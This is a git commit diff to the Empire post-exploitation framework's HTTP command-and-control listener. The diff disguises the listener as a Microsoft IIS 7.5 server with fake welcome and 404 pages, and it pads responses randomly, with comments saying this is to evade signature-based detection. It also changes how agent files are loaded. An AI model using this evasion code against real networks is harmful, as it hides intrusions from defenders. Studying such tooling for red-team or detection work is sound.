Minor changes for the install_path. My bad
commit
192630dedd
Binary file not shown.
After Width: | Height: | Size: 181 KiB |
|
@ -7,7 +7,7 @@ import ssl
|
|||
import time
|
||||
import copy
|
||||
from pydispatch import dispatcher
|
||||
from flask import Flask, request, make_response
|
||||
from flask import Flask, request, make_response, send_from_directory
|
||||
# Empire imports
|
||||
from lib.common import helpers
|
||||
from lib.common import agents
|
||||
|
@ -152,17 +152,86 @@ class Listener:
|
|||
# set the default staging key to the controller db default
|
||||
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
|
||||
|
||||
# randomize the length of the default_response and index_page headers to evade signature based scans
|
||||
self.header_offset = random.randint(0, 64)
|
||||
|
||||
def default_response(self):
|
||||
"""
|
||||
Returns an IIS 7.5 404 not found page.
|
||||
"""
|
||||
|
||||
return '\n'.join([
|
||||
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
|
||||
'<html xmlns="http://www.w3.org/1999/xhtml">',
|
||||
'<head>',
|
||||
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
|
||||
'<title>404 - File or directory not found.</title>',
|
||||
'<style type="text/css">',
|
||||
'<!--',
|
||||
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
|
||||
'fieldset{padding:0 15px 10px 15px;}',
|
||||
'h1{font-size:2.4em;margin:0;color:#FFF;}',
|
||||
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
|
||||
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
|
||||
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
|
||||
'background-color:#555555;}',
|
||||
'#content{margin:0 0 0 2%;position:relative;}',
|
||||
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
|
||||
'-->',
|
||||
'</style>',
|
||||
'</head>',
|
||||
'<body>',
|
||||
'<div id="header"><h1>Server Error</h1></div>',
|
||||
'<div id="content">',
|
||||
' <div class="content-container"><fieldset>',
|
||||
' <h2>404 - File or directory not found.</h2>',
|
||||
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
|
||||
' </fieldset></div>',
|
||||
'</div>',
|
||||
'</body>',
|
||||
'</html>',
|
||||
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
|
||||
])
|
||||
|
||||
def index_page(self):
|
||||
"""
|
||||
Returns a default HTTP server page.
|
||||
"""
|
||||
page = "<html><body><h1>It works!</h1>"
|
||||
page += "<p>This is the default web page for this server.</p>"
|
||||
page += "<p>The web server software is running but no content has been added, yet.</p>"
|
||||
page += "</body></html>"
|
||||
return page
|
||||
|
||||
return '\n'.join([
|
||||
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
|
||||
'<html xmlns="http://www.w3.org/1999/xhtml">',
|
||||
'<head>',
|
||||
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
|
||||
'<title>IIS7</title>',
|
||||
'<style type="text/css">',
|
||||
'<!--',
|
||||
'body {',
|
||||
' color:#000000;',
|
||||
' background-color:#B3B3B3;',
|
||||
' margin:0;',
|
||||
'}',
|
||||
'',
|
||||
'#container {',
|
||||
' margin-left:auto;',
|
||||
' margin-right:auto;',
|
||||
' text-align:center;',
|
||||
' }',
|
||||
'',
|
||||
'a img {',
|
||||
' border:none;',
|
||||
'}',
|
||||
'',
|
||||
'-->',
|
||||
'</style>',
|
||||
'</head>',
|
||||
'<body>',
|
||||
'<div id="container">',
|
||||
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
|
||||
'</div>',
|
||||
'</body>',
|
||||
'</html>',
|
||||
])
|
||||
|
||||
def validate_options(self):
|
||||
"""
|
||||
|
@ -572,7 +641,7 @@ class Listener:
|
|||
|
||||
if language == 'powershell':
|
||||
|
||||
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
|
||||
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
|
||||
code = f.read()
|
||||
f.close()
|
||||
|
||||
|
@ -598,7 +667,7 @@ class Listener:
|
|||
return code
|
||||
|
||||
elif language == 'python':
|
||||
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
|
||||
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
|
||||
code = f.read()
|
||||
f.close()
|
||||
|
||||
|
@ -827,7 +896,7 @@ def send_message(packets=None):
|
|||
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
|
||||
return launcher
|
||||
else:
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
|
||||
@app.before_request
|
||||
def check_ip():
|
||||
|
@ -836,7 +905,7 @@ def send_message(packets=None):
|
|||
"""
|
||||
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
|
||||
dispatcher.send("[!] %s on the blacklist/not on the whitelist requested resource" % (request.remote_addr), sender="listeners/http")
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
|
||||
|
||||
@app.after_request
|
||||
|
@ -854,6 +923,25 @@ def send_message(packets=None):
|
|||
response.headers['Expires'] = "0"
|
||||
return response
|
||||
|
||||
@app.route('/')
|
||||
@app.route('/index.html')
|
||||
def serve_index():
|
||||
"""
|
||||
Return default server web page if user navigates to index.
|
||||
"""
|
||||
|
||||
static_dir = self.mainMenu.installPath + "data/misc/"
|
||||
return make_response(self.index_page(), 200)
|
||||
|
||||
@app.route('/welcome.png')
|
||||
def serve_index_helper():
|
||||
"""
|
||||
Serves image loaded by index page.
|
||||
"""
|
||||
|
||||
static_dir = self.mainMenu.installPath + "data/misc/"
|
||||
return send_from_directory(static_dir, 'welcome.png')
|
||||
|
||||
|
||||
@app.route('/<path:request_uri>', methods=['GET'])
|
||||
def handle_get(request_uri):
|
||||
|
@ -906,7 +994,7 @@ def send_message(packets=None):
|
|||
print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP))
|
||||
return make_response(self.default_response(), 401)
|
||||
else:
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
|
||||
else:
|
||||
# actual taskings
|
||||
|
@ -914,14 +1002,13 @@ def send_message(packets=None):
|
|||
return make_response(results, 200)
|
||||
else:
|
||||
# dispatcher.send("[!] Results are None...", sender='listeners/http')
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
else:
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
|
||||
else:
|
||||
dispatcher.send("[!] %s requested by %s with no routing packet." % (request_uri, clientIP), sender='listeners/http')
|
||||
return make_response(self.default_response(), 200)
|
||||
|
||||
return make_response(self.default_response(), 404)
|
||||
|
||||
@app.route('/<path:request_uri>', methods=['POST'])
|
||||
def handle_post(request_uri):
|
||||
|
@ -966,16 +1053,16 @@ def send_message(packets=None):
|
|||
|
||||
elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'):
|
||||
dispatcher.send("[!] Error returned for results by %s : %s" %(clientIP, results), sender='listeners/http')
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
elif results == 'VALID':
|
||||
dispatcher.send("[*] Valid results return by %s" % (clientIP), sender='listeners/http')
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
else:
|
||||
return make_response(results, 200)
|
||||
else:
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
else:
|
||||
return make_response(self.default_response(), 200)
|
||||
return make_response(self.default_response(), 404)
|
||||
|
||||
try:
|
||||
certPath = listenerOptions['CertPath']['Value']
|
||||
|
@ -1003,7 +1090,6 @@ def send_message(packets=None):
|
|||
print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e))
|
||||
dispatcher.send("[!] Listener startup on port %s failed: %s " % (port, e), sender='listeners/http')
|
||||
|
||||
|
||||
def start(self, name=''):
|
||||
"""
|
||||
Start a threaded instance of self.start_server() and store it in the
|
||||
|
|
|
@ -31,7 +31,7 @@ elif STAGING_KEY == "RANDOM":
|
|||
|
||||
# Calculate the install path. We know the project directory will always be the parent of the current directory. Any modifications of the folder structure will
|
||||
# need to be applied here.
|
||||
INSTALL_PATH = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
|
||||
INSTALL_PATH = os.path.dirname(os.path.dirname(os.path.realpath(__file__))) + "/"
|
||||
|
||||
# an IP white list to ONLY accept clients from
|
||||
# format is "192.168.1.1,192.168.1.10-192.168.1.100,10.0.0.0/8"
|
||||
|
|
Loading…
Reference in New Issue